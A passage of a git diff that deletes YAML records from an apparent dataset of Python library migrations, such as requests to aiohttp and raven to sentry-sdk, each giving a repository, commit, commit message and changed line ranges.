talkpython/async-techniques-python-course -commit: aa607bd32a90d7693e91bd4a1be39baec2d889ba -pair_id: flask,quart -commit_message: Final code for first conversion from flask to quart (no real async - yet) -commit_url: https://github.com/talkpython/async-techniques-python-course/commit/aa607bd3 -code_changes: 
-- filepath: src/10-async-web/acityscape_api/app.py
-  lines:
-  - '1:1'
-  - '9:9'
-- filepath: src/10-async-web/acityscape_api/views/home.py
-  lines:
-  - '1:1'
-  - '3:3'
-  - '15:15'
-- filepath: src/10-async-web/acityscape_api/views/city_api.py
-  lines:
-  - '1:1'
-  - '4:4'
-  - 11-12:11-12
-  - 20-21:20-21
diff --git a/v1/data/migration/ab4e5fd_requests,aiohttp.yaml b/v1/data/migration/ab4e5fd_requests,aiohttp.yaml
deleted file mode 100644
index 1d7d359..0000000
--- a/v1/data/migration/ab4e5fd_requests,aiohttp.yaml
+++ /dev/null
@@ -1,14 +0,0 @@
-id: ab4e5fd_requests,aiohttp
-source: requests
-target: aiohttp
-repo: talkpython/async-techniques-python-course
-commit: ab4e5fdd32982c97e9701d3e1fdb8c39882d4250
-pair_id: requests,aiohttp
-commit_message: final code for web scraping with asyncio.
-commit_url: https://github.com/talkpython/async-techniques-python-course/commit/ab4e5fdd
-code_changes:
-- filepath: src/04-asyncio/web_scraping/async_scrape/program.py
-  lines:
-  - '1:3'
-  - 10:13-14
-  - '13:17'
diff --git a/v1/data/migration/ae216dd_pycrypto,pycryptodome.yaml b/v1/data/migration/ae216dd_pycrypto,pycryptodome.yaml
deleted file mode 100644
index f71bbdc..0000000
--- a/v1/data/migration/ae216dd_pycrypto,pycryptodome.yaml
+++ /dev/null
@@ -1,9 +0,0 @@
-id: ae216dd_pycrypto,pycryptodome
-source: pycrypto
-target: pycryptodome
-repo: wh1te909/tacticalrmm
-commit: ae216dd41d81c06bd5f7cad2bfef61f5c4843744
-pair_id: pycrypto,pycryptodome
-commit_message: replace pycrypto with newer pycryptodome
-commit_url: https://github.com/wh1te909/tacticalrmm/commit/ae216dd4
-code_changes: []
diff --git a/v1/data/migration/b19aae1_pycrypto,pycryptodome.yaml b/v1/data/migration/b19aae1_pycrypto,pycryptodome.yaml
deleted file mode 100644
index f7cd7e6..0000000
--- a/v1/data/migration/b19aae1_pycrypto,pycryptodome.yaml
+++ /dev/null
@@ -1,12 +0,0 @@
-id: b19aae1_pycrypto,pycryptodome
-source: pycrypto
-target: pycryptodome
-repo: bitshares/python-bitshares
-commit: b19aae1aca63b454c4ae756ddf045d99a7a2d8f5
-pair_id: pycrypto,pycryptodome
-commit_message: 'pycryptodome & readme updates
-
-
-  pycrypto has been depreciated & replaced with pycryptodome.'
-commit_url: https://github.com/bitshares/python-bitshares/commit/b19aae1a -code_changes: [] diff --git a/v1/data/migration/b2c9313_requests,aiohttp.yaml b/v1/data/migration/b2c9313_requests,aiohttp.yaml deleted file mode 100644 index f993e30..0000000 --- a/v1/data/migration/b2c9313_requests,aiohttp.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: b2c9313_requests,aiohttp -source: requests -target: aiohttp -repo: sabeechen/hassio-google-drive-backup -commit: b2c93130aee27ab377460ed9375b5cd89c35a44c -pair_id: requests,aiohttp -commit_message: Add asyncio requirements -commit_url: https://github.com/sabeechen/hassio-google-drive-backup/commit/b2c93130 -code_changes: [] diff --git a/v1/data/migration/b687d20_huey,celery.yaml b/v1/data/migration/b687d20_huey,celery.yaml deleted file mode 100644 index 0955b40..0000000 --- a/v1/data/migration/b687d20_huey,celery.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: b687d20_huey,celery -source: huey -target: celery -repo: lonelam/onlinejudgeshu -commit: b687d2067b28f6759a47ddcfe7bb575e8f83f679 -pair_id: huey,celery -commit_message: "\u5E9F\u5F03 huey\uFF0C\u591A\u6570\u636E\u5E93\u8FDE\u63A5\u7684\ - \u65F6\u5019\u5B58\u5728 connection \u65E0\u6CD5\u91CA\u653E\u7684\u95EE\u9898\uFF0C\ - \u56DE\u5230 celery" -commit_url: https://github.com/lonelam/onlinejudgeshu/commit/b687d206 -code_changes: -- filepath: submission/tasks.py - lines: - - '2:3' - - '7:7' diff --git a/v1/data/migration/b86b375_raven,sentry-sdk.yaml b/v1/data/migration/b86b375_raven,sentry-sdk.yaml deleted file mode 100644 index fd58864..0000000 --- a/v1/data/migration/b86b375_raven,sentry-sdk.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: b86b375_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: thespaghettidetective/thespaghettidetective -commit: b86b375952cc3e965c32201caa8094998c56cde7 -pair_id: raven,sentry-sdk -commit_message: Upgrade to Python 3.8 so that sentry will work with django channels - 2 -commit_url: https://github.com/thespaghettidetective/thespaghettidetective/commit/b86b3759 -code_changes: -- filepath: web/app/notifications.py - lines: - - '13:13' - - '44:44' - - '49:49' - - '54:54' - - 60:60 - - 66:66 - - 250:250 - - 256:256 - - 262:262 - - 268:268 diff --git a/v1/data/migration/b955ac9_ruamel.yaml,pyyaml.yaml b/v1/data/migration/b955ac9_ruamel.yaml,pyyaml.yaml deleted file mode 100644 index 2c150fb..0000000 --- a/v1/data/migration/b955ac9_ruamel.yaml,pyyaml.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: b955ac9_ruamel.yaml,pyyaml -source: ruamel.yaml -target: pyyaml -repo: microsoft/nni -commit: b955ac99a46094d2d701d447e9df07509767cc32 -pair_id: ruamel.yaml,pyyaml -commit_message: Use PyYAML instead of ruamel.yaml (#3702) -commit_url: https://github.com/microsoft/nni/commit/b955ac99 -code_changes: -- filepath: nni/tools/nnictl/common_utils.py - lines: - - '12:12' -- filepath: test/nni_test/nnitest/utils.py - lines: - - '12:12' - - '46:46' - - '51:51' -- filepath: nni/experiment/config/common.py - lines: - - '8:8' - - 121:121 -- filepath: test/nni_test/nnitest/run_tests.py - lines: - - '12:12' - - 83:83 -- filepath: nni/experiment/config/base.py - lines: - - '9:9' - - 75:75 -- filepath: nni/tools/package_utils/__init__.py - lines: - - '9:9' - - 218:218 - - 229:229 diff --git a/v1/data/migration/b9b65c0_pyyaml,ruamel.yaml.yaml b/v1/data/migration/b9b65c0_pyyaml,ruamel.yaml.yaml deleted file mode 100644 index c4bd035..0000000 --- a/v1/data/migration/b9b65c0_pyyaml,ruamel.yaml.yaml +++ /dev/null @@ -1,119 +0,0 @@ -id: b9b65c0_pyyaml,ruamel.yaml -source: pyyaml -target: ruamel.yaml -repo: 
common-workflow-language/cwltool -commit: b9b65c0f4d7531c8a97690356ecf1a34214eaac2 -pair_id: pyyaml,ruamel.yaml -commit_message: 'Squashed ''cwltool/schemas/'' changes from f027dbb..d03b190 - - - d03b190 Introducing refScope and typeDSL into CWL schema - - 5e1e438 Merge commit ''851b3c1302aa5b5d8a80f74c5732a617f62acefe'' into scoped-ref-and-typedsl - - 851b3c1 Split minimal base types used in CWL into metaschema_base.yml - - 510a01f Merge commit ''8823aaa11432aa042b3e307891e71ee13e11bfd7'' into scoped-ref-and-typedsl - - 8823aaa Adjust ref scopes - - 3431e18 Use scopedRef and typeDSL in metaschema - - 1e6dab6 Using typeDSL in metaschema. - - 3055f70 Update bootstrap context. - - 31db28e Merge branch ''master'' into type_dsl. Add test for typeDSL. - - 116d9e4 Merge branch ''resolve_all_refactor'' - - 8072bf5 "type" DSL wip - - 33ef215 Refactor resolve_all into smaller methods. - - ad8a111 Merge pull request #28 from common-workflow-language/scoped_ref - - 5aadf27 fix types - - 4ef52be Improve documentation. Add feature of skipping some inner scopes. - - c6d4a7b Reworking refScope to be fixed instead of search based. - - ae0ef4e Remove explicit calls to validate_links since it is folded into resolve_all(). - - 2fa6bfb update types - - e5d4730 New test for scoped ref that better reflects actual desired behavior. - - efbc9c4 Add scopedRef to metaschema. Tweak test. - - 9fcd67d Fold link validation into resolve_all() and resolve scoped identifiers. - - f36f52f Merge pull request #219 from denis-yuen/patch-1 - - da10eec always be updating (mypy-lang) - - e1e17ea upgrade Jenkins setuptools - - 563e5ef fix jenkins build - - 11b45b5 Merge pull request #224 from common-workflow-language/jenkins-link - - b4d790d Backport fixes to draft-3 - - 1ea9a5c add jenkins link - - 180a21e Corrections and test data - - f0ac285 Merge branch ''master'' of github.com:common-workflow-language/schema_salad - - 84738f1 better RDF schema error handling (#26) - - 3b8dc09 mypy 0.4 is out (#25) - - 5316da0 Add missing files for site generation. - - 31fbb76 Fix site generation workflows to specify draft-3 - - cff09a0 Add link to latest User Guide on front page - - 53b2ad7 Merge pull request #200 from common-workflow-language/draft-4 - - 089fbd7 start documenting the draft-4 changes - - 8c5bda0 Fix mapSubject fields when $import or $include is provided. - - 5b969ca fix diff-cover - - d798a7e split out mypy - - f43fa45 Fix tests - - 2d0398e Bump version. - - aeab7c3 Merge branch ''master'' of github.com:common-workflow-language/schema_salad - - e381f64 Return metaschema loader from load_schema. Don''t crash expanding identifier - fields when value is not a string. 
- - 15dae9f enhance CI - - fd2fcb3 more type checking (#21) - - c51c723 enable rdfa schema format (#22) - - ff192e8 turn off py3 support for now (#19) - - 0c5dba5 measure code coverage (#12) - - 2514a23 switch to ruamel.yaml, use C loader if available, only load safely (#20) - - - git-subtree-dir: cwltool/schemas - - git-subtree-split: d03b19017e35326ee753f6ca82d9bc4a56d44b99' -commit_url: https://github.com/common-workflow-language/cwltool/commit/b9b65c0f -code_changes: -- filepath: draft-4/salad/schema_salad/jsonld_context.py - lines: - - '3:4' diff --git a/v1/data/migration/baca6bb_urllib,urllib3.yaml b/v1/data/migration/baca6bb_urllib,urllib3.yaml deleted file mode 100644 index 1609a1f..0000000 --- a/v1/data/migration/baca6bb_urllib,urllib3.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: baca6bb_urllib,urllib3 -source: urllib -target: urllib3 -repo: thehive-project/cortex-analyzers -commit: baca6bbf601ae74d188cf8b483ccf4864f300d9c -pair_id: urllib,urllib3 -commit_message: changed requirements to urllib3 -commit_url: https://github.com/thehive-project/cortex-analyzers/commit/baca6bbf -code_changes: [] diff --git a/v1/data/migration/bbeb755_scapy-python3,scapy.yaml b/v1/data/migration/bbeb755_scapy-python3,scapy.yaml deleted file mode 100644 index 636f2fc..0000000 --- a/v1/data/migration/bbeb755_scapy-python3,scapy.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: bbeb755_scapy-python3,scapy -source: scapy-python3 -target: scapy -repo: danimtb/dasshio -commit: bbeb755a01d6092258a572e456b9e95bd2530328 -pair_id: scapy-python3,scapy -commit_message: 'Update scapy - - - scapy-python3 is an unofficial fork that is getting very oudated (many bug fixes - missing). - - Migrates to original and up-to-date scapy, which now supports both python 2 and - 3' -commit_url: https://github.com/danimtb/dasshio/commit/bbeb755a -code_changes: [] diff --git a/v1/data/migration/bed73dc_urllib,urllib3.yaml b/v1/data/migration/bed73dc_urllib,urllib3.yaml deleted file mode 100644 index 3a992bf..0000000 --- a/v1/data/migration/bed73dc_urllib,urllib3.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: bed73dc_urllib,urllib3 -source: urllib -target: urllib3 -repo: cyberreboot/vent -commit: bed73dc079dace87f73de7dc9fd59e4128b45cb6 -pair_id: urllib,urllib3 -commit_message: urllib3 -commit_url: https://github.com/cyberreboot/vent/commit/bed73dc0 -code_changes: [] diff --git a/v1/data/migration/c08ec7a_huey,celery.yaml b/v1/data/migration/c08ec7a_huey,celery.yaml deleted file mode 100644 index f12019e..0000000 --- a/v1/data/migration/c08ec7a_huey,celery.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: c08ec7a_huey,celery -source: huey -target: celery -repo: lonelam/onlinejudgeshu -commit: c08ec7a2dc084cd75cfe2f3327d6a044307e4f21 -pair_id: huey,celery -commit_message: "\u4FEE\u6539 admin \u754C\u9762\uFF0Cip \u592A\u5BBD\u4E86\n\nmonitor\ - \ \u4E0D\u518D\u4F7F\u7528\uFF0C\u914D\u7F6E\u5224\u9898\u670D\u52A1\u5668\u7684\ - \u4EE3\u7801\u79FB\u5165 judge_dispatcher \u91CC\u9762\n\n\u6DFB\u52A0\u524D\u7AEF\ - \u540E\u53F0\u5224\u9898\u670D\u52A1\u5668\u7BA1\u7406\u9875\u9762\u4E00\u4E9B\u6821\ - \u9A8C\u7684\u529F\u80FD\n\n\u53BB\u6389\u5224\u9898\u670D\u52A1\u5668\u76D1\u63A7\ - \u7684\u524D\u7AEF\u548C\u540E\u7AEF\n\n\u4FEE\u590D\u6BD4\u8D5B first ac \u663E\ - \u793A\u9519\u8BEF\u7684\u95EE\u9898\n\n\u4FEE\u590D\u4E24\u6B65\u9A8C\u8BC1\u4E2D\ - \u7684\u9519\u8BEF\n\ntfa \u663E\u793A url\n\n\u589E\u52A0 qrcode \u4F9D\u8D56\n\ - \n\u5B8C\u6210\u4E24\u6B65\u9A8C\u8BC1\u7684\u903B\u8F91\n\nfix error package name\ - \ and add pip mirrorwq\n\n\u5E9F\u5F03 
huey\uFF0C\u591A\u6570\u636E\u5E93\u8FDE\u63A5\ - \u7684\u65F6\u5019\u5B58\u5728 connection \u65E0\u6CD5\u91CA\u653E\u7684\u95EE\u9898\ - \uFF0C\u56DE\u5230 celery\n\n\u4FEE\u590D huey \u961F\u5217\u4E0D\u4F1A\u91CA\u653E\ - \u6570\u636E\u5E93\u8FDE\u63A5\u7684\u95EE\u9898\uFF0C\u662F\u7528\u6CD5\u4E0D\u5BF9\ - \n\n\u589E\u52A0\u5173\u95ED\u4E24\u6B65\u9A8C\u8BC1\u7684 api\n\n\u589E\u52A0\u4E24\ - \u6B65\u9A8C\u8BC1\u57FA\u7840\u4EE3\u7801\n\n\u5B8C\u5584 sso \u767B\u5F55\u90E8\ - \u5206\n\n\u89C4\u8303\u914D\u7F6E\u6587\u4EF6\u5199\u6CD5\uFF1B\u6570\u636E\u5E93\ - \u7528\u6237\u540D\u4E5F\u5728\u73AF\u5883\u53D8\u91CF\u4E2D\u53D6\n\n\u4E2A\u4EBA\ - \u535A\u5BA2\u94FE\u63A5\u524D\u9762\u4E5F\u589E\u52A0\u56FE\u6807\n\n\u4FEE\u6539\ - \u5224\u9898\u673A\u5668\u7684\u914D\u7F6E\u6587\u4EF6\n\n\u5220\u9664\u4E0D\u518D\ - \u4F7F\u7528\u7684\u914D\u7F6E\u6587\u4EF6\n\nSquash from a1fff74 to 12f96c6 by\ - \ virusdefender" -commit_url: https://github.com/lonelam/onlinejudgeshu/commit/c08ec7a2 -code_changes: [] diff --git a/v1/data/migration/c77913a_eventlet,gevent.yaml b/v1/data/migration/c77913a_eventlet,gevent.yaml deleted file mode 100644 index 5a21eb0..0000000 --- a/v1/data/migration/c77913a_eventlet,gevent.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: c77913a_eventlet,gevent -source: eventlet -target: gevent -repo: it3s/mootiro-maps -commit: c77913a45e3400e9e3f49dd4340e81a16a6c131f -pair_id: eventlet,gevent -commit_message: changed eventlet for gevent -commit_url: https://github.com/it3s/mootiro-maps/commit/c77913a4 -code_changes: [] diff --git a/v1/data/migration/c7c5a13_raven,sentry-sdk.yaml b/v1/data/migration/c7c5a13_raven,sentry-sdk.yaml deleted file mode 100644 index b0648ae..0000000 --- a/v1/data/migration/c7c5a13_raven,sentry-sdk.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: c7c5a13_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: line/promgen -commit: c7c5a138e4592aa1f0fa182ca1f8b971afaf7156 -pair_id: raven,sentry-sdk -commit_message: '[INTERNAL] Switch from raven to sentry_sdk' -commit_url: https://github.com/line/promgen/commit/c7c5a138 -code_changes: [] diff --git a/v1/data/migration/cbaf252_python-ldap,ldap3.yaml b/v1/data/migration/cbaf252_python-ldap,ldap3.yaml deleted file mode 100644 index 909b518..0000000 --- a/v1/data/migration/cbaf252_python-ldap,ldap3.yaml +++ /dev/null @@ -1,14 +0,0 @@ -id: cbaf252_python-ldap,ldap3 -source: python-ldap -target: ldap3 -repo: cloud-custodian/cloud-custodian -commit: cbaf252ff1eb554511b0384392ea02387887ed6c -pair_id: python-ldap,ldap3 -commit_message: "replace Python-LDAP with ldap3 (#690)\n\n* fix args in mailer\u2019\ - s setup.py\n\n* switch mailer to ldap3\n\nclose #637\n\n* check that manager was\ - \ set" -commit_url: https://github.com/cloud-custodian/cloud-custodian/commit/cbaf252f -code_changes: -- filepath: tools/c7n_mailer/c7n_mailer/address.py - lines: - - 19:16-20 diff --git a/v1/data/migration/cc47b42_python-ldap,ldap3.yaml b/v1/data/migration/cc47b42_python-ldap,ldap3.yaml deleted file mode 100644 index 08b300c..0000000 --- a/v1/data/migration/cc47b42_python-ldap,ldap3.yaml +++ /dev/null @@ -1,14 +0,0 @@ -id: cc47b42_python-ldap,ldap3 -source: python-ldap -target: ldap3 -repo: ictu/quality-time -commit: cc47b42cf70b6968b22a3819bf0b9714135271c1 -pair_id: python-ldap,ldap3 -commit_message: 'Issue #679 ldap3 library implemented instead of python_ldap (#703)' -commit_url: https://github.com/ictu/quality-time/commit/cc47b42c -code_changes: -- filepath: components/server/src/routes/auth.py - lines: - - 11:13-14 - - 47:66 - - 
50-51:73 diff --git a/v1/data/migration/cdaff15_pycrypto,cryptography.yaml b/v1/data/migration/cdaff15_pycrypto,cryptography.yaml deleted file mode 100644 index 45335da..0000000 --- a/v1/data/migration/cdaff15_pycrypto,cryptography.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: cdaff15_pycrypto,cryptography -source: pycrypto -target: cryptography -repo: freeopcua/opcua-asyncio -commit: cdaff1575780a99ab035abb08a6ad13414cd4859 -pair_id: pycrypto,cryptography -commit_message: completely remove dependency to pycrypto -commit_url: https://github.com/freeopcua/opcua-asyncio/commit/cdaff157 -code_changes: -- filepath: opcua/uacrypto.py - lines: - - 8-15:3-7 diff --git a/v1/data/migration/cdb6679_pil,pillow.yaml b/v1/data/migration/cdb6679_pil,pillow.yaml deleted file mode 100644 index 5631f91..0000000 --- a/v1/data/migration/cdb6679_pil,pillow.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: cdb6679_pil,pillow -source: pil -target: pillow -repo: fantomas42/django-blog-zinnia -commit: cdb667907dc2aa943955df49c4d4a604b4ecd195 -pair_id: pil,pillow -commit_message: using Pillow 2.0 for Python 2 & 3 compatibility -commit_url: https://github.com/fantomas42/django-blog-zinnia/commit/cdb66790 -code_changes: [] diff --git a/v1/data/migration/cec78f4_pil,pillow.yaml b/v1/data/migration/cec78f4_pil,pillow.yaml deleted file mode 100644 index 90fbb2a..0000000 --- a/v1/data/migration/cec78f4_pil,pillow.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: cec78f4_pil,pillow -source: pil -target: pillow -repo: numenta/nupic -commit: cec78f4f639b51c9b59050b68f2b014a299d7c33 -pair_id: pil,pillow -commit_message: 'replace PIL with Pillow - - - Pillow is a fork of PIL, with newer features and more (pip) packaging friendly.' -commit_url: https://github.com/numenta/nupic/commit/cec78f4f -code_changes: [] diff --git a/v1/data/migration/cf856c0_gevent,eventlet.yaml b/v1/data/migration/cf856c0_gevent,eventlet.yaml deleted file mode 100644 index b99af42..0000000 --- a/v1/data/migration/cf856c0_gevent,eventlet.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: cf856c0_gevent,eventlet -source: gevent -target: eventlet -repo: stefal/rtkbase -commit: cf856c0cc9cbb0f810d59c9419f8789a1f9f5a80 -pair_id: gevent,eventlet -commit_message: 'Switching back to eventlet - - I can''t use gevent because: - - - I can''t install it on an orange pi zero with only 256MB ram - - - It breaks the satellite and location broadcast thread #29 - - - Adding pyopenssl to fix #22 doesn''t help, I had to add pyopenssl AND switch from - urllib to requests - - - fix #29 - - fix #22' -commit_url: https://github.com/stefal/rtkbase/commit/cf856c0c -code_changes: -- filepath: web_app/server.py - lines: - - 26-27:28-29 diff --git a/v1/data/migration/d10cb16_raven,sentry-sdk.yaml b/v1/data/migration/d10cb16_raven,sentry-sdk.yaml deleted file mode 100644 index 9549b99..0000000 --- a/v1/data/migration/d10cb16_raven,sentry-sdk.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: d10cb16_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: weasyl/weasyl -commit: d10cb162447d9e3a9506b76054851863b10ff27a -pair_id: raven,sentry-sdk -commit_message: "Upgrade Sentry client from raven to sentry-sdk\n\nThe API isn\u2019\ - t great and there\u2019s already a workaround for a bug/glaring omission, but the\ - \ library is actively maintained and the new performance/tracing features are nice." 
-commit_url: https://github.com/weasyl/weasyl/commit/d10cb162 -code_changes: -- filepath: weasyl/middleware.py - lines: - - 316:305 - - 8-9:10 -- filepath: weasyl/define.py - lines: - - 988:979 diff --git a/v1/data/migration/d15540f_gcloud-aio-core,aiohttp.yaml b/v1/data/migration/d15540f_gcloud-aio-core,aiohttp.yaml deleted file mode 100644 index 14926b9..0000000 --- a/v1/data/migration/d15540f_gcloud-aio-core,aiohttp.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: d15540f_gcloud-aio-core,aiohttp -source: gcloud-aio-core -target: aiohttp -repo: talkiq/gcloud-aio -commit: d15540f94ecdf468b1baf7fd9c025e4f862b3b69 -pair_id: gcloud-aio-core,aiohttp -commit_message: 'feat(taskqueue): migrate to cloudtasks v2beta2 (#13)' -commit_url: https://github.com/talkiq/gcloud-aio/commit/d15540f9 -code_changes: -- filepath: taskqueue/gcloud/aio/taskqueue/taskqueue.py - lines: - - 12-17:6 diff --git a/v1/data/migration/d3a9a16_requests,aiohttp.yaml b/v1/data/migration/d3a9a16_requests,aiohttp.yaml deleted file mode 100644 index 9de5508..0000000 --- a/v1/data/migration/d3a9a16_requests,aiohttp.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: d3a9a16_requests,aiohttp -source: requests -target: aiohttp -repo: ictu/quality-time -commit: d3a9a16a72348cece48c9788cf10db6cc043ec7c -pair_id: requests,aiohttp -commit_message: 'Async collector (#1102) - - - Collector is now asynchronous.' -commit_url: https://github.com/ictu/quality-time/commit/d3a9a16a -code_changes: -- filepath: components/collector/src/base_collectors/source_collector.py - lines: - - 106:101 - - '13:13' -- filepath: components/collector/src/collector_utilities/functions.py - lines: - - '18:18' -- filepath: components/collector/src/collector_utilities/type.py - lines: - - '15:16' - - '5:5' -- filepath: components/collector/src/source_collectors/api_source_collectors/azure_devops.py - lines: - - '12:12' - - '31:31' - - '40:41' - - '52:53' - - 93:93 - - 122:122 - - 133:133 - - 157:158 diff --git a/v1/data/migration/d3bedb7_raven,sentry-sdk.yaml b/v1/data/migration/d3bedb7_raven,sentry-sdk.yaml deleted file mode 100644 index 11ec069..0000000 --- a/v1/data/migration/d3bedb7_raven,sentry-sdk.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: d3bedb7_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: rafalp/misago_docker -commit: d3bedb763bb0d021c7c629423335daaa32b70152 -pair_id: raven,sentry-sdk -commit_message: Update Sentry to SDK -commit_url: https://github.com/rafalp/misago_docker/commit/d3bedb76 -code_changes: [] diff --git a/v1/data/migration/d4119a0_flask-restful,flask-restplus.yaml b/v1/data/migration/d4119a0_flask-restful,flask-restplus.yaml deleted file mode 100644 index 829369d..0000000 --- a/v1/data/migration/d4119a0_flask-restful,flask-restplus.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: d4119a0_flask-restful,flask-restplus -source: flask-restful -target: flask-restplus -repo: testdrivenio/flask-react-aws -commit: d4119a0f609b151df99b2250e419c168e688a0c6 -pair_id: flask-restful,flask-restplus -commit_message: testing ci -commit_url: https://github.com/testdrivenio/flask-react-aws/commit/d4119a0f -code_changes: -- filepath: services/users/project/api/users/views.py - lines: - - '5:5' -- filepath: services/users/project/api/ping.py - lines: - - '5:4' - - '8:6' diff --git a/v1/data/migration/d54d772_python-social-auth,social-auth-app-django.yaml b/v1/data/migration/d54d772_python-social-auth,social-auth-app-django.yaml deleted file mode 100644 index d24fe5d..0000000 --- a/v1/data/migration/d54d772_python-social-auth,social-auth-app-django.yaml +++ /dev/null @@ 
-1,9 +0,0 @@ -id: d54d772_python-social-auth,social-auth-app-django -source: python-social-auth -target: social-auth-app-django -repo: cmjatai/cmj -commit: d54d772e5ae033845381879baa84a7bbd3ebc727 -pair_id: python-social-auth,social-auth-app-django -commit_message: Adiciona React ao projeto -commit_url: https://github.com/cmjatai/cmj/commit/d54d772e -code_changes: [] diff --git a/v1/data/migration/d6cd8df_pyqt5,pyside6.yaml b/v1/data/migration/d6cd8df_pyqt5,pyside6.yaml deleted file mode 100644 index af7329e..0000000 --- a/v1/data/migration/d6cd8df_pyqt5,pyside6.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: d6cd8df_pyqt5,pyside6 -source: pyqt5 -target: pyside6 -repo: toufool/auto-split -commit: d6cd8dfdc93aff7e1ff8763a06a64e20a18a4a33 -pair_id: pyqt5,pyside6 -commit_message: Python 3.9 + PyQt6 -commit_url: https://github.com/toufool/auto-split/commit/d6cd8dfd -code_changes: [] diff --git a/v1/data/migration/d707ff6_gevent,eventlet.yaml b/v1/data/migration/d707ff6_gevent,eventlet.yaml deleted file mode 100644 index 2096ed0..0000000 --- a/v1/data/migration/d707ff6_gevent,eventlet.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: d707ff6_gevent,eventlet -source: gevent -target: eventlet -repo: duanhongyi/dwebsocket -commit: d707ff652fd74c3420e83a50fc9b1b9026ed0d98 -pair_id: gevent,eventlet -commit_message: add py3k support -commit_url: https://github.com/duanhongyi/dwebsocket/commit/d707ff65 -code_changes: -- filepath: examples/run_eventlet.py - lines: - - 14-15:16 - - 3-5:1-2,6 diff --git a/v1/data/migration/d84b166_python-social-auth,social-auth-app-django.yaml b/v1/data/migration/d84b166_python-social-auth,social-auth-app-django.yaml deleted file mode 100644 index 9cfae92..0000000 --- a/v1/data/migration/d84b166_python-social-auth,social-auth-app-django.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: d84b166_python-social-auth,social-auth-app-django -source: python-social-auth -target: social-auth-app-django -repo: humanbrainproject/hbp_neuromorphic_platform -commit: d84b1668c85c9b57f0a5269b7b5ff72f2ff73808 -pair_id: python-social-auth,social-auth-app-django -commit_message: Updated from python-social-auth (deprecated) to social-auth-app-django -commit_url: https://github.com/humanbrainproject/hbp_neuromorphic_platform/commit/d84b1668 -code_changes: [] diff --git a/v1/data/migration/d8dedc7_pycrypto,pycryptodome.yaml b/v1/data/migration/d8dedc7_pycrypto,pycryptodome.yaml deleted file mode 100644 index 8f74af8..0000000 --- a/v1/data/migration/d8dedc7_pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: d8dedc7_pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -repo: quantopian/penguindome -commit: d8dedc77ff5e30350733ac2517334d458db3efb2 -pair_id: pycrypto,pycryptodome -commit_message: 'Replace pycrypto with pycryptodome - - - Pycryptodome is a drop-in replacement for pycrypto, and pycrypto is no - - longer being maintained and has known security issues (though none - - them actually impact how we use it), so we might as well replace - - pycrypto with pycryptodome.' 
-commit_url: https://github.com/quantopian/penguindome/commit/d8dedc77
-code_changes: []
diff --git a/v1/data/migration/dac43f8_gunicorn,waitress.yaml b/v1/data/migration/dac43f8_gunicorn,waitress.yaml
deleted file mode 100644
index 2534f16..0000000
--- a/v1/data/migration/dac43f8_gunicorn,waitress.yaml
+++ /dev/null
@@ -1,9 +0,0 @@
-id: dac43f8_gunicorn,waitress
-source: gunicorn
-target: waitress
-repo: covidzero/hummingbird-v2
-commit: dac43f81346d1b23752698cf53d8fb9be721993b
-pair_id: gunicorn,waitress
-commit_message: change from gunicorn to waitress (#85)
-commit_url: https://github.com/covidzero/hummingbird-v2/commit/dac43f81
-code_changes: []
diff --git a/v1/data/migration/db7f132_flask,quart.yaml b/v1/data/migration/db7f132_flask,quart.yaml
deleted file mode 100644
index 07e3092..0000000
--- a/v1/data/migration/db7f132_flask,quart.yaml
+++ /dev/null
@@ -1,13 +0,0 @@
-id: db7f132_flask,quart
-source: flask
-target: quart
-repo: learningorchestra/learningorchestra
-commit: db7f1321e13b5386f94670537aa49943f0f0cec9
-pair_id: flask,quart
-commit_message: adding quart to make async requests
-commit_url: https://github.com/learningorchestra/learningorchestra/commit/db7f1321
-code_changes:
-- filepath: microservices/projection_image/server.py
-  lines:
-  - '1:1'
-  - '33:33'
diff --git a/v1/data/migration/dcd48ef_fuzzywuzzy,rapidfuzz.yaml b/v1/data/migration/dcd48ef_fuzzywuzzy,rapidfuzz.yaml
deleted file mode 100644
index 98bd145..0000000
--- a/v1/data/migration/dcd48ef_fuzzywuzzy,rapidfuzz.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: dcd48ef_fuzzywuzzy,rapidfuzz
-source: fuzzywuzzy
-target: rapidfuzz
-repo: nlpia/nlpia-bot
-commit: dcd48ef24e6b879ff46ad6d4a70a872cfb31a936
-pair_id: fuzzywuzzy,rapidfuzz
-commit_message: 'use rapidfuzz instead of fuzzywuzzy
-
-
-
-  Former-commit-id: 15c4727acbe187e9b8eb5ca030027d3ba394f004 [formerly b8155b57812d0a2f5c2cb22e1ed10f1adc8e2476]
-
-  Former-commit-id: a27da32d3a703dd37cbdc1e401540c97c8aabe48
-
-  Former-commit-id: 5cf1807ded5b5b6c22ed8a70968910a7c99c066f'
-commit_url: https://github.com/nlpia/nlpia-bot/commit/dcd48ef2
-code_changes: []
diff --git a/v1/data/migration/dd3b266_urllib,urllib3.yaml b/v1/data/migration/dd3b266_urllib,urllib3.yaml
deleted file mode 100644
index 30e983c..0000000
--- a/v1/data/migration/dd3b266_urllib,urllib3.yaml
+++ /dev/null
@@ -1,10 +0,0 @@
-id: dd3b266_urllib,urllib3
-source: urllib
